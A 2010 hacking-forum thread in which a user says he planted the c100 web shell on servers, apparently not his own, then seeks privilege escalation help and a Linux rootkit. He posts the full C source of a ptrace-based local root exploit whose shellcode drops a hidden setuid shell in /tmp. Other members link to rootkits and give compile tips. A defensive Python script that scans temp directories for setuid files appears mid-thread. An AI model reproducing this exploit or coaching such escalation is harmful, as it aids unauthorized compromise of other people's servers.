Waraxe IT Security Portal  
Now what?
AIR_Nayden (Advanced user)
Posted: Sun Jan 10, 2010 9:13 am
Joined: Dec 30, 2009 | Posts: 70 | Location: Bulgaria

Hi ;)

These days I uploaded c100 on some servers... but there are directories which aren't editable by me. So my question is: how to escalate my privileges or login as another user?

Please give more details, cause I'm not very good in working with unix systems...

AIR_Nayden (Advanced user)
Posted: Sun Jan 10, 2010 10:44 am
Joined: Dec 30, 2009 | Posts: 70 | Location: Bulgaria

Does anyone have a rootkit for the 2.6.x Linux kernel?

pexli (Valuable expert)
Posted: Sun Jan 10, 2010 2:35 pm
Joined: May 24, 2007 | Posts: 665 | Location: Bulgaria

Quote:
Please give more details, cause I'm not very good in working with unix systems...


+

Quote:
does anyone have rootkit for 2.6.x linux kernel?


A bit dumb, isn't it?

vince213333 (Advanced user)
Posted: Sun Jan 10, 2010 2:40 pm
Joined: Aug 03, 2009 | Posts: 737 | Location: Belgium

Maybe he's a fast learner, pexli ;)

AIR_Nayden (Advanced user)
Posted: Sun Jan 10, 2010 3:18 pm
Joined: Dec 30, 2009 | Posts: 70 | Location: Bulgaria

Well no, why would it be dumb? The one I have won't compile for some reason, so I'm looking for another one ;) Can you help?

vince213333 (Advanced user)
Posted: Sun Jan 10, 2010 3:34 pm
Joined: Aug 03, 2009 | Posts: 737 | Location: Belgium

Code:
http://www.enye-sec.org/en/programs.html


3rd one in the list.

Or

Code:
http://seclists.org/dailydave/2008/q3/215


I hope it helps :?

AIR_Nayden (Advanced user)
Posted: Sun Jan 10, 2010 3:36 pm
Joined: Dec 30, 2009 | Posts: 70 | Location: Bulgaria

Well, I found one, compiled it and tried to run it, but I suppose I didn't do that correctly.

Code:

/*
ptrace_attach privilege escalation exploit by s0m3b0dy

[*] tested on Gentoo 2.6.29rc1

grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

email: s0m3b0dy1 (at) gmail.com
*/

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
        unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        unsigned long orig_eax, eip;
        unsigned short cs, __cs;
        unsigned long eflags, esp;
        unsigned short ss, __ss;
};

main()
{
struct user_regs_struct322  regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd";  // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
 wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
                printf("\n[-] read registers\n");
      exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                       printf("\n[-] write shellcode\n");
         exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}


When I run it I get this output:

Quote:

Usage: gpasswd [-r|-R] group
gpasswd [-a user] group
gpasswd [-d user] group
gpasswd [-A user,...] [-M user,...] group

[-] Attach


I guess gpasswd is some suid file (I have to give the path to it??). But what are the other parameters? How should I run this exploit correctly?
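
The payload embedded in the exploit posted above writes a setuid binary to /tmp/.exp, so a hidden setuid file in a temp directory is a host artifact worth hunting for. The following is an added defensive example, not part of the original post: it lists setuid/setgid files under temp directories and reports whether those mounts carry nosuid. The function names, the directory list and the sample mounts text are assumptions made for illustration.

```python
import os
import stat

# Constructed sample in /proc/mounts format (not taken from any real host).
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
tmpfs /tmp tmpfs rw,relatime 0 0
"""

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def nosuid_status(mounts_text, targets=TEMP_DIRS):
    """Report, per target directory, whether its own mount carries nosuid."""
    status = {t: "not a separate mount" for t in targets}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] in status:
            opts = fields[3].split(",")
            status[fields[1]] = "nosuid" if "nosuid" in opts else "suid allowed"
    return status


def find_setid_files(roots):
    """Return sorted (path, mode, owner uid) for regular files with setuid/setgid set."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
            for name in files:  # os.walk includes dot-files such as .exp
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # file vanished or is unreadable
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((path, stat.filemode(st.st_mode), st.st_uid))
    return sorted(hits)


if __name__ == "__main__":
    try:
        with open("/proc/mounts") as fh:
            mounts = fh.read()
    except OSError:
        mounts = SAMPLE_MOUNTS  # fall back to the constructed sample
    for target, state in nosuid_status(mounts).items():
        print(f"{target}: {state}")
    for path, mode, uid in find_setid_files(TEMP_DIRS):
        print(f"setuid/setgid file in temp dir: {path} {mode} uid={uid}")
```

Any hit in a temp directory deserves investigation, and mounting those directories with nosuid makes the kernel ignore the bit even if such a file is created.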

gat3way (Regular user)
Posted: Sun Jan 10, 2010 6:52 pm
Joined: Dec 11, 2008 | Posts: 5

Quote:
http://www.enye-sec.org/en/programs.html


Very interesting...

AIR_Nayden (Advanced user)
Posted: Sun Jan 10, 2010 7:13 pm
Joined: Dec 30, 2009 | Posts: 70 | Location: Bulgaria

Vince, do you have any idea how to compile the exploit that you suggested?

vince213333 (Advanced user)
Posted: Sun Jan 10, 2010 7:23 pm
Joined: Aug 03, 2009 | Posts: 737 | Location: Belgium

gat3way wrote:
Quote:
http://www.enye-sec.org/en/programs.html


Very interesting...


Randomly googled :)

And AIR_Nayden, it seems like C code to me. Based on the use of structures and -1 instead of the boolean "false" etc... Though I don't know that much about this kind of exploit.

Maybe use the program gcc and try
Code:
gcc -c exploit.c -o nameOfExploitAfterCompiling


I'm just guessing though, there are people on here who know much more of this than I do :?

AIR_Nayden (Advanced user)
Posted: Sun Jan 10, 2010 7:29 pm
Joined: Dec 30, 2009 | Posts: 70 | Location: Bulgaria

But which filename should I write? There is more than one .c file :(

vince213333 (Advanced user)
Posted: Sun Jan 10, 2010 7:32 pm
Joined: Aug 03, 2009 | Posts: 737 | Location: Belgium

Try looking for the file with the "main" function in it. That's usually the function that is executed first in C.